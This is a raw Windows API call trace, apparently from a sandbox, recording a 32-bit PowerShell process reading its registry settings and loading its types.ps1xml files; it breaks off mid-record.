RegQueryValueExW (in: hKey=0x348, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x24e4d4, lpData=0x0, lpcbData=0x24e4d0*=0x0 | out: lpType=0x24e4d4*=0x0, lpData=0x0, lpcbData=0x24e4d0*=0x0) returned 0x2 [0138.557] RegCloseKey (hKey=0x348) returned 0x0 [0138.671] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.671] GetLastError () returned 0xcb [0138.673] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.673] GetLastError () returned 0xcb [0138.837] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.837] GetLastError () returned 0xcb [0138.837] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.837] GetLastError () returned 0xcb [0138.846] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e410 | out: phkResult=0x24e410*=0x348) returned 0x0 [0138.905] RegQueryValueExW (in: hKey=0x348, lpValueName="path", lpReserved=0x0, lpType=0x24e478, lpData=0x0, lpcbData=0x24e474*=0x0 | out: lpType=0x24e478*=0x1, lpData=0x0, lpcbData=0x24e474*=0x74) returned 0x0 [0138.907] RegQueryValueExW (in: hKey=0x348, lpValueName="path", lpReserved=0x0, lpType=0x24e458, lpData=0x0, lpcbData=0x24e454*=0x0 | out: lpType=0x24e458*=0x1, lpData=0x0, lpcbData=0x24e454*=0x74) returned 0x0 [0138.907] RegQueryValueExW (in: hKey=0x348, lpValueName="path", lpReserved=0x0, lpType=0x24e458, lpData=0x338390, lpcbData=0x24e454*=0x74 | out: lpType=0x24e458*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x24e454*=0x74) returned 0x0 [0138.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x24dfd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0138.907] GetLastError () returned 0xcb [0138.907] SetErrorMode (uMode=0x1) returned 0x1 [0138.907] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x24e458 | out: lpFileInformation=0x24e458*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0138.907] GetLastError () returned 0xcb [0138.907] SetErrorMode (uMode=0x1) returned 0x1 [0138.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24dfcc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0138.910] GetLastError () returned 0xcb [0138.910] SetErrorMode (uMode=0x1) returned 0x1 [0138.910] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24e44c | out: lpFileInformation=0x24e44c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0138.911] GetLastError () returned 0xcb [0138.911] SetErrorMode (uMode=0x1) returned 0x1 [0138.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24dfcc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0138.914] GetLastError () returned 0xcb [0138.914] SetErrorMode (uMode=0x1) returned 0x1 [0138.914] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24e44c | out: lpFileInformation=0x24e44c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0138.914] GetLastError () returned 0xcb [0138.914] SetErrorMode (uMode=0x1) returned 0x1 [0138.972] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0138.972] GetLastError () returned 0xcb [0138.973] GetACP () returned 0x4e4 [0139.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24de5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0139.172] GetLastError () returned 0x0 [0139.172] SetErrorMode (uMode=0x1) returned 0x1 [0139.173] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x350 [0139.173] GetLastError () returned 0x0 [0139.174] GetFileType (hFile=0x350) returned 0x1 [0139.174] SetErrorMode (uMode=0x1) returned 0x1 [0139.174] GetFileType (hFile=0x350) returned 0x1 [0139.176] ReadFile (in: hFile=0x350, lpBuffer=0x2c21f84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c21f84*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.215] GetLastError () returned 0x0 [0139.215] ReadFile (in: hFile=0x350, lpBuffer=0x2c21f84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c21f84*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.215] GetLastError () returned 0x0 [0139.215] ReadFile (in: hFile=0x350, lpBuffer=0x2c21f84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c21f84*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.215] GetLastError () returned 0x0 [0139.216] ReadFile (in: hFile=0x350, lpBuffer=0x2c21f84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c21f84*, lpNumberOfBytesRead=0x24e3c4*=0xcf3, lpOverlapped=0x0) returned 1 [0139.216] GetLastError () returned 0x0 [0139.216] ReadFile (in: hFile=0x350, lpBuffer=0x2c21417, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c21417*, lpNumberOfBytesRead=0x24e3c4*=0x0, lpOverlapped=0x0) returned 1 [0139.216] GetLastError () returned 0x0 [0139.216] ReadFile (in: hFile=0x350, lpBuffer=0x2c21f84, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c21f84*, lpNumberOfBytesRead=0x24e3c4*=0x0, lpOverlapped=0x0) returned 1 [0139.216] GetLastError () returned 0x0 [0139.217] CloseHandle (hObject=0x350) returned 1 [0139.235] GetLastError () returned 0x0 [0139.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24df24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0139.236] GetLastError () returned 0x0 [0139.236] SetErrorMode (uMode=0x1) returned 0x1 [0139.236] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2c332f8 | out: lpFileInformation=0x2c332f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0139.236] GetLastError () returned 0x0 [0139.236] SetErrorMode (uMode=0x1) returned 0x1 [0139.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0139.254] GetLastError () returned 0x0 [0139.254] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e348 | out: phkResult=0x24e348*=0x350) returned 0x0 [0139.255] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e390, lpData=0x0, lpcbData=0x24e38c*=0x0 | out: lpType=0x24e390*=0x1, lpData=0x0, lpcbData=0x24e38c*=0x56) returned 0x0 [0139.255] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e390, lpData=0x338390, lpcbData=0x24e38c*=0x56 | out: lpType=0x24e390*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x24e38c*=0x56) returned 0x0 [0139.255] RegCloseKey (hKey=0x350) returned 0x0 [0139.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0139.255] GetLastError () returned 0x0 [0139.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x24de84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0139.256] GetLastError () returned 0x0 [0139.446] GetSystemInfo (in: lpSystemInfo=0x24dac8 | out: lpSystemInfo=0x24dac8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0139.447] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0139.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24de5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0139.514] GetLastError () returned 0x0 [0139.514] SetErrorMode (uMode=0x1) returned 0x1 [0139.514] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x350 [0139.514] GetLastError () returned 0x0 [0139.514] GetFileType (hFile=0x350) returned 0x1 [0139.514] SetErrorMode (uMode=0x1) returned 0x1 [0139.514] GetFileType (hFile=0x350) returned 0x1 [0139.514] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.797] GetLastError () returned 0x0 [0139.797] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.831] GetLastError () returned 0x0 [0139.831] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.831] GetLastError () returned 0x0 [0139.832] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.832] GetLastError () returned 0x0 [0139.832] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.832] GetLastError () returned 0x0 [0139.833] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.833] GetLastError () returned 0x0 [0139.833] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.833] GetLastError () returned 0x0 [0139.833] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.833] GetLastError () returned 0x0 [0139.833] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.833] GetLastError () returned 0x0 [0139.834] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.834] GetLastError () returned 0x0 [0139.834] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.834] GetLastError () returned 0x0 [0139.834] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.834] GetLastError () returned 0x0 [0139.835] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.835] GetLastError () returned 0x0 [0139.835] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.835] GetLastError () returned 0x0 [0139.835] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.835] GetLastError () returned 0x0 [0139.835] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.835] GetLastError () returned 0x0 [0139.835] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.835] GetLastError () returned 0x0 [0139.837] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.837] GetLastError () returned 0x0 [0139.837] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.837] GetLastError () returned 0x0 [0139.838] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.838] GetLastError () returned 0x0 [0139.838] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.838] GetLastError () returned 0x0 [0139.838] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.838] GetLastError () returned 0x0 [0139.838] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.838] GetLastError () returned 0x0 [0139.838] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.838] GetLastError () returned 0x0 [0139.838] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.838] GetLastError () returned 0x0 [0139.839] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.839] GetLastError () returned 0x0 [0139.839] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.839] GetLastError () returned 0x0 [0139.839] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.839] GetLastError () returned 0x0 [0139.839] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.839] GetLastError () returned 0x0 [0139.839] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.839] GetLastError () returned 0x0 [0139.839] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.839] GetLastError () returned 0x0 [0139.840] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.840] GetLastError () returned 0x0 [0139.840] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.840] GetLastError () returned 0x0 [0139.864] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.864] GetLastError () returned 0x0 [0139.864] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.864] GetLastError () returned 0x0 [0139.865] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.865] GetLastError () returned 0x0 [0139.865] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.865] GetLastError () returned 0x0 [0139.865] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.865] GetLastError () returned 0x0 [0139.865] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.865] GetLastError () returned 0x0 [0139.865] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.865] GetLastError () returned 0x0 [0139.865] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1000, lpOverlapped=0x0) returned 1 [0139.865] GetLastError () returned 0x0 [0139.865] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x1b4, lpOverlapped=0x0) returned 1 [0139.866] GetLastError () returned 0x0 [0139.866] ReadFile (in: hFile=0x350, lpBuffer=0x2c67714, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2c67714*, lpNumberOfBytesRead=0x24e3c4*=0x0, lpOverlapped=0x0) returned 1 [0139.866] GetLastError () returned 0x0 [0139.866] CloseHandle (hObject=0x350) returned 1 [0139.866] GetLastError () returned 0x0 [0139.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24df24, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0139.866] GetLastError () returned 0x0 [0139.866] SetErrorMode (uMode=0x1) returned 0x1 [0139.866] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2c87fa4 | out: lpFileInformation=0x2c87fa4*(dwFileAttributes=0x20, 